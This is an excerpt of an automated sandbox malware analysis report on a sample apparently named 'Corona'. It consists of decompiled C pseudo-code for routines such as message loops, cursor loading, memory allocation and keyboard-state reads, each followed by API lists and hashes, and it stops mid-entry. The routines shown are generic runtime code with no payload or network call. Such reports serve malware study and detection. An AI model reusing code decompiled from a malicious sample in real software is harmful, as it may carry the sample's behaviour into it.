                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  • KiUserCallbackDispatcher.NTDLL ref: 0042388C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                  • String ID: GetSystemMetrics
                                  • API String ID: 54681038-96882338
                                  • Opcode ID: def72a328a68513b707d10d80732f21a3c2b232fb0eedb8df014ff6c3fce43cc
                                  • Instruction ID: 57b566c20d2f4e411566e339f85b7675b107d6237a02cd692b1396c5036fa134
                                  • Opcode Fuzzy Hash: def72a328a68513b707d10d80732f21a3c2b232fb0eedb8df014ff6c3fce43cc
                                  • Instruction Fuzzy Hash: B0F0C2A07006211AD7047E74BE8422337E6EF46732FD04F23F1228D2E1C27CCA89520D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BA08, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E0040BA08(void* __eax, void* __ebx) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t27;
				void* _t37;
				intOrPtr _t43;
				void* _t48;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				void* _t59;
				intOrPtr _t60;

				_t58 = _t59;
				_t60 = _t59 + 0xffffffe8;
				_v12 = 0;
				_push(_t58);
				_push(0x40bade);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60;
				_v8 = 0xffffffff;
				E00403EE4( &_v12, __eax);
				E0040435C( &_v12);
				_push( &_v16);
				_t27 = E0040430C(_v12);
				_push(_t27); // executed
				L00406004(); // executed
				_t48 = _t27;
				if(_t48 == 0) {
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(E0040BAE5);
					return E00403E4C( &_v12);
				} else {
					_v20 = E004026BC(_t48);
					_push(_t58);
					_push(0x40bac1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t60;
					_push(_v20);
					_push(_t48);
					_push(_v16);
					_t37 = E0040430C(_v12);
					_push(_t37); // executed
					L00405FFC(); // executed
					if(_t37 != 0) {
						_push( &_v28);
						_push( &_v24);
						_push(E0040BAF0);
						_t43 = _v20;
						_push(_t43);
						L0040600C();
						if(_t43 != 0) {
							_v8 =  *((intOrPtr*)(_v24 + 8));
						}
					}
					_pop(_t56);
					 *[fs:eax] = _t56;
					_push(0x40bac8);
					return E004026DC(_v20);
				}
			}


















                                  0x0040ba09
                                  0x0040ba0b
                                  0x0040ba11
                                  0x0040ba18
                                  0x0040ba19
                                  0x0040ba1e
                                  0x0040ba21
                                  0x0040ba24
                                  0x0040ba30
                                  0x0040ba38
                                  0x0040ba40
                                  0x0040ba44
                                  0x0040ba49
                                  0x0040ba4a
                                  0x0040ba4f
                                  0x0040ba53
                                  0x0040baca
                                  0x0040bacd
                                  0x0040bad0
                                  0x0040badd
                                  0x0040ba55
                                  0x0040ba5c
                                  0x0040ba61
                                  0x0040ba62
                                  0x0040ba67
                                  0x0040ba6a
                                  0x0040ba70
                                  0x0040ba71
                                  0x0040ba75
                                  0x0040ba79
                                  0x0040ba7e
                                  0x0040ba7f
                                  0x0040ba86
                                  0x0040ba8b
                                  0x0040ba8f
                                  0x0040ba90
                                  0x0040ba95
                                  0x0040ba98
                                  0x0040ba99
                                  0x0040baa0
                                  0x0040baa8
                                  0x0040baa8
                                  0x0040baa0
                                  0x0040baad
                                  0x0040bab0
                                  0x0040bab3
                                  0x0040bac0
                                  0x0040bac0

                                  APIs
                                  • 739414E0.VERSION(00000000,?,00000000,0040BADE), ref: 0040BA4A
                                  • 739414C0.VERSION(00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA7F
                                  • 73941500.VERSION(?,0040BAF0,?,?,00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA99
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 739414$73941500
                                  • String ID:
                                  • API String ID: 1696551078-0
                                  • Opcode ID: fa8a75a5305403ac69c7f2f9e2a3a2cdaaa72d90785727027f2ae7d77c4b9a37
                                  • Instruction ID: 95f9542b90d64b902932ade0986f9de82f611bea35365d2c9d7e3486098096f4
                                  • Opcode Fuzzy Hash: fa8a75a5305403ac69c7f2f9e2a3a2cdaaa72d90785727027f2ae7d77c4b9a37
                                  • Instruction Fuzzy Hash: AD213DB1B00609AFDB01EFA5CC919AEB7FCEB48704B514576F910F36D1D778AA008A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BA06, Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 43%
                                  			E0040BA06(void* __eax, void* __ebx) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t27;
				void* _t37;
				intOrPtr _t43;
				void* _t48;
				intOrPtr _t55;
				intOrPtr _t56;
				void* _t58;
				void* _t59;
				intOrPtr _t60;

				_t58 = _t59;
				_t60 = _t59 + 0xffffffe8;
				_v12 = 0;
				_push(_t58);
				_push(0x40bade);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60;
				_v8 = 0xffffffff;
				E00403EE4( &_v12, __eax);
				E0040435C( &_v12);
				_push( &_v16);
				_t27 = E0040430C(_v12);
				_push(_t27); // executed
				L00406004(); // executed
				_t48 = _t27;
				if(_t48 == 0) {
					_pop(_t55);
					 *[fs:eax] = _t55;
					_push(E0040BAE5);
					return E00403E4C( &_v12);
				} else {
					_v20 = E004026BC(_t48);
					_push(_t58);
					_push(0x40bac1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t60;
					_push(_v20);
					_push(_t48);
					_push(_v16);
					_t37 = E0040430C(_v12);
					_push(_t37); // executed
					L00405FFC(); // executed
					if(_t37 != 0) {
						_push( &_v28);
						_push( &_v24);
						_push(E0040BAF0);
						_t43 = _v20;
						_push(_t43);
						L0040600C();
						if(_t43 != 0) {
							_v8 =  *((intOrPtr*)(_v24 + 8));
						}
					}
					_pop(_t56);
					 *[fs:eax] = _t56;
					_push(0x40bac8);
					return E004026DC(_v20);
				}
			}


















                                  0x0040ba09
                                  0x0040ba0b
                                  0x0040ba11
                                  0x0040ba18
                                  0x0040ba19
                                  0x0040ba1e
                                  0x0040ba21
                                  0x0040ba24
                                  0x0040ba30
                                  0x0040ba38
                                  0x0040ba40
                                  0x0040ba44
                                  0x0040ba49
                                  0x0040ba4a
                                  0x0040ba4f
                                  0x0040ba53
                                  0x0040baca
                                  0x0040bacd
                                  0x0040bad0
                                  0x0040badd
                                  0x0040ba55
                                  0x0040ba5c
                                  0x0040ba61
                                  0x0040ba62
                                  0x0040ba67
                                  0x0040ba6a
                                  0x0040ba70
                                  0x0040ba71
                                  0x0040ba75
                                  0x0040ba79
                                  0x0040ba7e
                                  0x0040ba7f
                                  0x0040ba86
                                  0x0040ba8b
                                  0x0040ba8f
                                  0x0040ba90
                                  0x0040ba95
                                  0x0040ba98
                                  0x0040ba99
                                  0x0040baa0
                                  0x0040baa8
                                  0x0040baa8
                                  0x0040baa0
                                  0x0040baad
                                  0x0040bab0
                                  0x0040bab3
                                  0x0040bac0
                                  0x0040bac0

                                  APIs
                                  • 739414E0.VERSION(00000000,?,00000000,0040BADE), ref: 0040BA4A
                                  • 739414C0.VERSION(00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA7F
                                  • 73941500.VERSION(?,0040BAF0,?,?,00000000,?,00000000,?,00000000,0040BAC1,?,00000000,?,00000000,0040BADE), ref: 0040BA99
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: 739414$73941500
                                  • String ID:
                                  • API String ID: 1696551078-0
                                  • Opcode ID: 661085833e0bea8bd47ec95dcdbe8d963a55364808f607da40b6ce5be6428edf
                                  • Instruction ID: 9fcdf3018fcfce0c944acd244da8a4f266773b0829d259413805819a846e3391
                                  • Opcode Fuzzy Hash: 661085833e0bea8bd47ec95dcdbe8d963a55364808f607da40b6ce5be6428edf
                                  • Instruction Fuzzy Hash: 94211DB1B00609AFDB01EFA9CC919AFB7FCEB48304B514576B910F36D1D778AD008A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044DA54, Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0044DA54(void* __eax, char* __ecx, struct tagMSG* __edx) {
				int _t7;
				int _t21;
				MSG* _t30;
				void* _t31;
				char* _t32;

				_t22 = __ecx;
				_push(__ecx);
				_t30 = __edx;
				_t31 = __eax;
				_t21 = 0;
				_t7 = PeekMessageA(__edx, 0, 0, 0, 1); // executed
				if(_t7 != 0) {
					_t21 = 1;
					if(_t30->message == 0x12) {
						 *((char*)(_t31 + 0x9c)) = 1;
					} else {
						 *_t32 = 0;
						if( *((short*)(_t31 + 0xda)) != 0) {
							_t22 = _t32;
							 *((intOrPtr*)(_t31 + 0xd8))();
						}
						if(E0044D9B4(_t31, _t30) == 0 &&  *_t32 == 0 && E0044D8AC(_t31, _t30) == 0 && E0044D8FC(_t31, _t22, _t30) == 0 && E0044D888(_t31, _t30) == 0) {
							TranslateMessage(_t30);
							DispatchMessageA(_t30); // executed
						}
					}
				}
				return _t21;
			}








                                  0x0044da54
                                  0x0044da57
                                  0x0044da58
                                  0x0044da5a
                                  0x0044da5c
                                  0x0044da67
                                  0x0044da6e
                                  0x0044da70
                                  0x0044da76
                                  0x0044dade
                                  0x0044da78
                                  0x0044da78
                                  0x0044da84
                                  0x0044da86
                                  0x0044da90
                                  0x0044da90
                                  0x0044daa1
                                  0x0044dad1
                                  0x0044dad7
                                  0x0044dad7
                                  0x0044daa1
                                  0x0044da76
                                  0x0044daeb

                                  APIs
                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0044DA67
                                  • TranslateMessage.USER32 ref: 0044DAD1
                                  • DispatchMessageA.USER32 ref: 0044DAD7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Message$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 4217535847-0
                                  • Opcode ID: a00bf5d97ec0a8114e3e335b1ee543c2ee6a3d2b24aa0af9799211d47867fcd3
                                  • Instruction ID: 117a82a1d019e0b0608a9482b61cf7bab67bbd9cbd9ed0af0cfb7f2c3174e571
                                  • Opcode Fuzzy Hash: a00bf5d97ec0a8114e3e335b1ee543c2ee6a3d2b24aa0af9799211d47867fcd3
                                  • Instruction Fuzzy Hash: 3E01F510F4860016FE30362A2805B7B93D54FE1758F18846FF485B7382CAAD4C06C22E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042FA58, Relevance: 3.1, APIs: 2, Instructions: 129COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042FA58(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				intOrPtr* _t47;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0042E394(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								_t47 =  *0x450fc8; // 0x452bb0
								E0044E788( *_t47, _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E004032F8(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x452b10; // 0x21312f4
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x452b10; // 0x21312f4
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x452b10; // 0x21312f4
								__eflags =  *_t79 -  *((intOrPtr*)(_t90 + 0x1c));
								if( *_t79 !=  *((intOrPtr*)(_t90 + 0x1c))) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00444F20( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E004032F8(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E00444FDC(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E00444FDC(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}























                                  0x0042fa64
                                  0x0042fa66
                                  0x0042fa6c
                                  0x0042faa4
                                  0x0042faa4
                                  0x0042faab
                                  0x0042fae4
                                  0x0042fae6
                                  0x0042faeb
                                  0x0042fbc3
                                  0x0042fbc3
                                  0x0042fbc8
                                  0x0042fbd5
                                  0x0042fbd5
                                  0x0042fbda
                                  0x00000000
                                  0x0042fbe0
                                  0x0042faf1
                                  0x0042faf6
                                  0x00000000
                                  0x00000000
                                  0x0042fafc
                                  0x0042fb00
                                  0x0042fb16
                                  0x0042fb18
                                  0x0042fb18
                                  0x0042fb1d
                                  0x0042fb2a
                                  0x0042fb2c
                                  0x0042fb35
                                  0x00000000
                                  0x0042fb35
                                  0x0042fb1f
                                  0x0042fb1f
                                  0x0042fb20
                                  0x0042fb3f
                                  0x0042fb3f
                                  0x0042fb43
                                  0x0042fb55
                                  0x00000000
                                  0x0042fb55
                                  0x00000000
                                  0x0042fb4b
                                  0x0042fb22
                                  0x0042fb22
                                  0x0042fb23
                                  0x0042fb5c
                                  0x00000000
                                  0x0042fb5c
                                  0x0042fb25
                                  0x0042fb26
                                  0x00000000
                                  0x00000000
                                  0x0042fb63
                                  0x0042fb68
                                  0x0042fb6c
                                  0x00000000
                                  0x0042fb6e
                                  0x0042fb6e
                                  0x0042fb73
                                  0x0042fb77
                                  0x00000000
                                  0x00000000
                                  0x0042fb7b
                                  0x0042fb81
                                  0x0042fb84
                                  0x00000000
                                  0x00000000
                                  0x0042fb8d
                                  0x0042fb94
                                  0x0042fba2
                                  0x0042fba9
                                  0x0042fbb0
                                  0x00000000
                                  0x0042fbbc
                                  0x00000000
                                  0x0042fb6c
                                  0x0042fb02
                                  0x0042fb02
                                  0x0042fb07
                                  0x0042fb13
                                  0x0042fb13
                                  0x0042fb13
                                  0x00000000
                                  0x0042fb13
                                  0x0042fb09
                                  0x0042fb09
                                  0x0042fb0c
                                  0x00000000
                                  0x00000000
                                  0x0042fb0e
                                  0x0042fb11
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042fb11
                                  0x0042fabb
                                  0x0042fac2
                                  0x00000000
                                  0x00000000
                                  0x0042fad1
                                  0x0042fad9
                                  0x00000000
                                  0x0042fadf
                                  0x0042fa6e
                                  0x0042fa75
                                  0x0042fa7c
                                  0x00000000
                                  0x0042fa8a
                                  0x0042fa99
                                  0x0042fa9e
                                  0x00000000
                                  0x00000000
                                  0x0042fa9e
                                  0x0042fa7c
                                  0x0042fbe9

                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 0042FB8D
                                  • KiUserCallbackDispatcher.NTDLL ref: 0042FBE0
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CallbackDispatcherKeyboardStateUser
                                  • String ID:
                                  • API String ID: 4281813569-0
                                  • Opcode ID: c397eee2e54774f553fe80ba5e0f14c2f0c986b241041ab36c5d9285bcd6eac7
                                  • Instruction ID: 00b2bcc830db05189438873d62b20479d6555502c69b5680d4ee4e2ac5f0d7c1
                                  • Opcode Fuzzy Hash: c397eee2e54774f553fe80ba5e0f14c2f0c986b241041ab36c5d9285bcd6eac7
                                  • Instruction Fuzzy Hash: 8F4191307002258BDB20CF68E5986AABBB4AB45304FD441B7E405DB396D77CFD4ACB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004020E8, Relevance: 3.1, APIs: 2, Instructions: 124COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004019FC: RtlInitializeCriticalSection.KERNEL32(004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A12
                                    • Part of subcall function 004019FC: RtlEnterCriticalSection.KERNEL32(004525C8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A25
                                    • Part of subcall function 004019FC: LocalAlloc.KERNEL32(00000000,00000FF8,004525C8,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401A4F
                                    • Part of subcall function 004019FC: RtlLeaveCriticalSection.KERNEL32(004525C8,00401AB9,00000000,00401AB2,?,?,00402296,00452608,00000000,00000000,?,?,00401C85,00401C9A,00401DEB), ref: 00401AAC
                                  • RtlEnterCriticalSection.KERNEL32(004525C8,00000000,00402264), ref: 00402133
                                  • RtlLeaveCriticalSection.KERNEL32(004525C8,0040226B), ref: 0040225E
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                  • String ID:
                                  • API String ID: 2227675388-0
                                  • Opcode ID: 516a3cd2ebdca4a963e3ab3a65ad23722ef784fb924c829345a2c0903020c877
                                  • Instruction ID: 2a17153c8fad00030586e2ea1ef5383a8770bf21e291bdf0f7973367168ab37b
                                  • Opcode Fuzzy Hash: 516a3cd2ebdca4a963e3ab3a65ad23722ef784fb924c829345a2c0903020c877
                                  • Instruction Fuzzy Hash: 364103B2A047049FE715CF69DE9922977A0FB46319B2541BFD401F73E2E2B8A901CB4C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B980, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044B980(void* __eax) {
				struct HICON__* _t5;
				void* _t7;
				void* _t8;
				struct HINSTANCE__* _t11;
				CHAR** _t12;
				void* _t13;

				_t13 = __eax;
				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
				_t8 = 0xffffffea;
				_t12 = 0x450cb0;
				do {
					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
						if(_t8 != 0xffffffeb) {
							_t11 = 0;
						} else {
							goto L4;
						}
					} else {
						L4:
						_t11 =  *0x452664; // 0x400000
					}
					_t5 = LoadCursorA(_t11,  *_t12); // executed
					_t7 = E0044BA38(_t13, _t5, _t8);
					_t8 = _t8 + 1;
					_t12 =  &(_t12[1]);
				} while (_t8 != 0xffffffff);
				return _t7;
			}









                                  0x0044b984
                                  0x0044b992
                                  0x0044b995
                                  0x0044b99a
                                  0x0044b99f
                                  0x0044b9a2
                                  0x0044b9ac
                                  0x0044b9b6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044b9ae
                                  0x0044b9ae
                                  0x0044b9ae
                                  0x0044b9ae
                                  0x0044b9bc
                                  0x0044b9c7
                                  0x0044b9cc
                                  0x0044b9cd
                                  0x0044b9d0
                                  0x0044b9d9

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CursorLoad
                                  • String ID:
                                  • API String ID: 3238433803-0
                                  • Opcode ID: 44e8e0c868297989131988027fa6405fef302279d83b1ee55fa26e3801488370
                                  • Instruction ID: 1ea9eced8182a7bb80591af10c9a6fca55f1b020b1f35a3f327f2a7d6308c993
                                  • Opcode Fuzzy Hash: 44e8e0c868297989131988027fa6405fef302279d83b1ee55fa26e3801488370
                                  • Instruction Fuzzy Hash: 6FF08262A0435417AA20563E5CC1A2A7284DB96735F71033BFA2AD63D1CB39EC028699
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406714, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406714(int __eax, long __edx) {
				void* _t2;

				_t2 = GlobalAlloc(__eax, __edx); // executed
				GlobalFix(_t2);
				return _t2;
			}




                                  0x00406716
                                  0x0040671c
                                  0x00406721

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Global$Alloc
                                  • String ID:
                                  • API String ID: 2558781224-0
                                  • Opcode ID: a91d873cc96961059f0ff57fc0c7ac3617c9ee3aa2e20b9fa74691af3b7816ce
                                  • Instruction ID: 871b2fc79884c773065efd50e950bf119b60d0cd6bc374945b811ddc14d11b55
                                  • Opcode Fuzzy Hash: a91d873cc96961059f0ff57fc0c7ac3617c9ee3aa2e20b9fa74691af3b7816ce
                                  • Instruction Fuzzy Hash: F29002C4864A4224ED0072B20C0AD3F041CDCD07083C0486F3004B20878A3C8C00083D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401514, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401514(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E004013C8(0x4525e8, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                  0x00401517
                                  0x00401521
                                  0x00401530
                                  0x00401523
                                  0x00401523
                                  0x00401523
                                  0x00401536
                                  0x00401543
                                  0x00401548
                                  0x0040154a
                                  0x0040154e
                                  0x00401557
                                  0x0040155e
                                  0x0040156a
                                  0x00401571
                                  0x00000000
                                  0x00401571
                                  0x0040155e
                                  0x00401576

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040181D), ref: 00401543
                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040181D), ref: 0040156A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
